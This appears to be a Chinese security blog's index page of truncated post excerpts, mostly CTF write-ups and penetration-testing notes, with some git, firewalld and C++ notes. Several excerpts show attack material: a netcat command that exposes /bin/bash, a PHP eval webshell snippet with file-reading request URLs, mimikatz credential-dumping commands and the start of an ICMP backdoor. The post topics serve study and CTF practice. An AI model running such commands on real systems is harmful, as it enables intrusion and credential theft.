river

原创 git基础入门命令

git建立仓库的基本命令

原创 firewalld使用命令

一、centos7版本对防火墙进行加强,不再使用原来的iptables,启用firewalld1.firewalld的基本使用启动： systemctl start firewalld查状态：systemctl status firewalld停止： systemctl disable firewalld禁用： systemctl stop firewalld在开机时启用一个服务...

原创 L2TP和PPTP的区别

用最短的时间搞清楚L2TP和PPTP的区别一、相关知识铺垫：（1）虚拟隧道协议一种通过公共网络的基础设施，在专用网络或专用设备之间实现加密数据通信的技术，通信的内容是可以是任何通信协议的数据包。隧道协议将这些协议的数据包重新封装在新的包中发送，新的包提供了路由信息，从而使封装的数据能够通过公共网络传递，传递时所经过的逻辑路径成为隧道。当数据包到达通信终点后，将被拆封并转发到最终的目的地。隧道...

原创 XCTF-攻防世界 CGfsb 格式化字符串漏洞

攻防世界-CGfsb-格式化字符串漏洞参考自 http://geekfz.cn/index.php/2019/06/12/pwn-format/程序拿下来丢到IDA F5int __cdecl main(int argc, const char **argv, const char **envp){ int buf; // [esp+1Eh] [ebp-7Eh] int v5; ...

转载 CTF中PHP知识点总结

https://www.restran.net/2016/09/26/php-security-notes/

原创 FacebookCTF2019 web writeup

facebookCTF2019rceservice - 绕过preg_matchhttp://challenges.fbctf.com:8085We created this web interface to run commands on our servers, but since we haven't figured out how to secure it yet we only l...

转载 RCTF2019-WEB-nextphp

RCTF-web-nextphp<?phpif (isset($_GET['a'])) { eval($_GET['a']);} else { show_source(__FILE__);}http://192.168.1.8/?a=var_dump(scandir(getcwd()));http://192.168.1.8/?a=show_so...

原创 wordpress5.0分析和漏洞调试初试

​一、WordPress源码分析wordpress是单一入口，最初调用的是index.phpdefine( 'WP_USE_THEMES', true );/** Loads the WordPress Environment and Template */require( dirname( __FILE__ ) . '/wp-blog-header.php' );index.ph...

原创 Root-Me PHP - eval题解

做了一下PHP的题目，其他解法网上已经有了http://exp-blog.com/2019/01/02/pid-2597/但是PHP eval这个题目没有详细的writeup,所以自己做了一下PHP - Evalhttp://challenge01.root-me.org/web-serveur/ch57/进入题目查看给出的代码如下：<html><head>&...

原创 php代码审计知识点总结

**Php可以命令执行的函数**string shell_exec( string command)Shell_exec通过shell环境执行命令，并且将完整的输出以字符串的方式返回。PHP先运行一个shell环境，然后让shell进程运行你的命令，并且把所有输出以字符串形式返回，如果程序执行有错误或者程序没有输出，则返回null。<?php$output = shell_exe...

原创 flag在管理员手里-hash长度扩展攻击学习

Flag在管理员手里主要是hash长度扩展攻击的原理，其实只要明白了md5算法的大致过程就可以容易理解。首先题目看看要求什么条件才能获取flag1.要求cookie中role=admin，这个简单，直接修改HTTP包内容就行。2.要求hsh===MD5($salt.strrev($_COOKIE[“role”])) 第二步中，salt是不知道的，但是hsh时我们传入，相当于已知的。所以...

原创 一道CTF题目引发的Mysql的udf学习

一道CTF题目引发的Mysql的udf学习关键词：UDF：User defined Function查看Mysql插件路径Select @@plugin_dir Show variables like “plugin%”UDF是Mysql的一个拓展接口，可以用户自定义函数 ，是拓展mysql自带函数满足不了要求的情况。UDF的特性，函数能返回字符串、整数或实数语法：CREA...

原创 jarvisoj Inject & PHPINFO

JarvisojInject扫描后台得到index.php~<?phprequire("config.php");$table = $_GET['table']?$_GET['table']:"test";$table = Filter($table);mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();$sq...

原创 bugkuctf web基础部分 writeup

Bugku-ctf-web 管理员系统随便输入用户名和密码提示窗体顶端窗体底端IP禁止访问，请联系本地管理员登陆，IP已被记录.明显需要伪造允许登录的IP知识点：XFF头(X-Forwarded-For)，代表客户端，也就是HTTP的请求端真实的IP。有两种方式可以从HTTP请求中获得请求者的IP地址。一个是从Remote Address中获得，另一个是从X-Forward-For中...

原创 bugctf web代码审计 writeup

把题目做完了，记录一下题解extract变量覆盖<?php$flag='xxx';extract($_GET);if(isset($shiyan)){$content=trim(file_get_contents($flag));if($shiyan==$content){echo'flag{xxx}';}else{echo'Oh.no';}}?>...

转载 Linux后门之道——NC用法别有洞天

对于瑞士军刀nc我们再熟悉不过了，经常被用来进行数据包发送，文件传送以及反弹shell。在渗透测试过程中如果想反弹shell我们通常的做法是：nc -l -vv -p 2222 -e /bin/bash在Linux的大部分发行版中都默认编译了nc，但也许是出于安全考虑，发行版中默认编译的nc往往没有-e选项(没有define一个GAPING_SECURITY_HOLE常量)，也就是说我们不能...

原创 踩下的坑-ssh源码编译

1.配置环境（1）主要影响生成文件的版本：openssl版本（2）查看目标/etc/ssh/sshd_config的编译选项，比如在configure时候用–with-pam（3）config时候用syscondir=/etc/ssh，会去读取/etc/ssh/sshd_config（4) 编译命令 ./configure --prefix=/usr/local --sysconfdir=...

原创 域渗透总结

域渗透总结学习并做了一段时间域网络渗透，给我直观的感受就是思路问题和耐心，这个不像技术研究，需要对一个点进行研究，而是遇到问题后要从多个方面思考，寻找"捷径"思路，只要思路正确，有足够有耐心，总会有所突破。现在将自己遇到的技术点及相关知识做一个总结，不足之处，请批评指正。​ -----一只萌新域环境搭建不再详述，参考：&gt; AD域环境的搭建 基于Ser...

转载 windows ICMP 后门

服务端#include #include #include #include #include "stdafx.h"#pragma comment(lib, "Urlmon.lib")#pragma comment(lib, "ws2_32.lib") #define ICMP_PASSWORD 1234 ...

原创 c++编写windows服务

// GtServ.cpp : Defines the entry point for the console application.//#include&lt;stdio.h&gt;#include&lt;Windows.h&gt;#include&lt;tchar.h&gt;SERVICE_STATUS m_ServiceStatus; SERVICE_STATUS_HAN...

原创 wechall-部分题解

Training: Encodings IWe intercepted this message from one challenger to another, maybe you can find out what they were talking about.To help you on your progress I coded a small java application,...

原创 wechall - Prime Factory

#coding:utf-8import mathdef is_prime(number): for i in range(2,(int)(math.sqrt(number)+1)): if(number%i == 0): return 0 return 1def add_bit(number): sum_bit=0 ...

原创 ubuntu14.04下redmine搭建过程

参考： redmine下载地址 http://www.redmine.org/releases/ 搭建教程http://www.redmine.org/projects/redmine/wiki/HowTo_Install_Redmine_on_Ubuntu_step_by_step http://www.redmine.org/projects/redmine/wiki/HowTo_I...

原创 git学习记录

一、跟着教程走 具体介绍一大堆，只记录干货，毕竟只是个工具 第一步：创建版本库 mkdir learngit cd learngit pwd **git init** 通过git init命令把这个目录变成Git可以管理的仓库 瞬间Git就把仓库建好了，而且告诉你是一个空的仓库（empty Git repository），细心的读者可以发现当前目录下多了一个.git的目录（这个...

原创 windows 磁盘文件目录遍历

#define _CRT_SECURE_NO_WARNINGS//#include &lt;windows.h&gt;#include &lt;Shlwapi.h&gt;#include &lt;iostream&gt;#include &lt;string&gt;#include &lt;vector&gt;#pragma comment(lib,"shlwapi.lib") ...

原创 windows注册表操作

#include &amp;lt;stdio.h&amp;gt;#include &amp;lt;stdlib.h&amp;gt;#include &amp;lt;time.h&amp;gt;#include &amp;lt;windows.h&amp;gt;int main(int argc, char *argv[]){ LONG lRet = 0; HKEY hKeyProg = NULL; char s

原创 刷洞3---espcms注入漏洞

我用的是ESPCMSV6700170807_INSTALL.zip，这个版本的下述漏洞已经修补了，不过我下载的时候不知道，找到了如何修补的方法，自己强行修改为有漏洞的代码，复现了一把。漏洞位置：adminsoft/control/citylist.phpclass important extends connector { function important() { ...

原创 刷洞2---74cms注入漏洞

基础积累: 1.在我们拿到一套源码的时候，首先需要寻找连接数据库的密码和网站后台的密码。 第一种方法是看文件名，看看有没有明显的config.php global_function.php类似的文件。 第二种方式是全局搜索&amp;quot;new mysql(&amp;quot;&amp;quot;mysqli_connect(&amp;quot;&amp;quot;new PDO&amp;quot;这个是php连接数据库的常用操作，

原创 how to use metasploit to attack

I’m sorry for my english,0^0(1) on kali2 start shell and input msfconsole here i will explain some args for msfconsole[+++++]. banner you would see banner for etasploit,which information useful...

转载 ssh端口转发实例

SSH端口转发 for 内网渗透一直在使用，发现好多参数都不太清楚，搜到了一份很好的资料，与大家分享，也自己做记录。（1）SSH/plink命令的基本资料：首先，认识下这三个非常强大的命令： ssh -C -f -N -g -L listen_port:DST_Host:DST_port user@Tunnel_Host ssh -C -f -N -g -R li...

原创 ETERNALROMANCE 复现

make a record . use nsa exploit -&amp;gt; ETERNALROMANCE to attack winxp \ winserver2003(1)environment python 2.6.6(python-2.6.6.msi) shadowbroker-master.zip pywin32-221.win32-py2.6.exewhich can be...

原创 socket编程小记

原创 刷洞1--74cms3.5后台任意文件删除漏洞

干了这么多年，突然觉得自己跟安全离的越来越远，真正的网络安全和代码安全息息相关，包括传统的审计、逆向、漏洞以及新型的AI安全研究。还是安安心心写代码，调漏洞吧，要不然也枉在这个行业工作。对于小白来说，我还是从老版本的cms开始，借助大牛们的博客开始吧。http://0day5.com/archives/3981/ 使用74cms3.5 后台任意文件删除elseif($act == ...

转载 udf提权

udf提权小结00x1首先判断mysql版本，mysql版本 &lt; 5.2 , UDF导出到系统目录c:/windows/system32/mysql版本 &gt; 5.2 ，UDF导出到安装路径MySQL\Lib\Plugin\一般Lib、Plugin文件夹需要手工建立（可用流模式突破进而创建文件夹）可能会用到的命令:select @@datadir 路径s...

原创 jarvis oj web writeup

IN A Mess tips: index.phpserror_reporting(0);echo "&lt;!--index.phps--&gt;";if (!$_GET['id']) { header('Location: index.php?id=1'); exit();}$id = $_GET['id'];$a = $_GET['a'];$b = $...

原创 how to use mimikatz ?

(1) Get Local User’s Hash privilege::debug lsadump::lsa /inject (2) Get memory password privilege::debug sekurlsa::logonPasswords (3) use lsass.dmp to crack password ...

原创 在类的静态函数中如何调用类的非静态成员

折磨了我好久的问题，还是自己c，c++功力不够，其实把类自己的指针作为参数传入到静态函数中 就可以使用了。–,…….

转载 TCP socket心跳包示例程序

#include<Windows.h>#include<stdio.h>#define MAXLEN 409600void main(){ HANDLE hSysInFile; hSysInFile = CreateFile("C:\\users\\public\\music\\setup.log",GENERIC_READ,FILE_SHARE_READ, NU

转载 CreateEvent使用

Windows API——CREATEEVENT——创建事件事件是一个允许一个线程在某种情况发生时，唤醒另外一个线程的同步对象。事件告诉线程何时去执行某一给定的任务，从而使多个线程流平滑CreateEvent是创建windows事件的意思，作用主要用在判断线程退出，线程锁定方面.HANDLE CreateEvent( 　　 LPSECURITY_ATTRIBUTES lpEv

转载 Qt在信号中如何发送自定义结构体，或者发送多个自定义参数

昨天调试项目时，突然发现如下消息：QObject::connect: Cannot queue arguments of type 'ERROR_LEVEL'(Make sure 'ERROR_LEVEL' is registered using qRegisterMetaType().)其中ERROR_LEVEL只是我定义的枚举类型即enum ERROR_LEVEL。然后在Qt的信号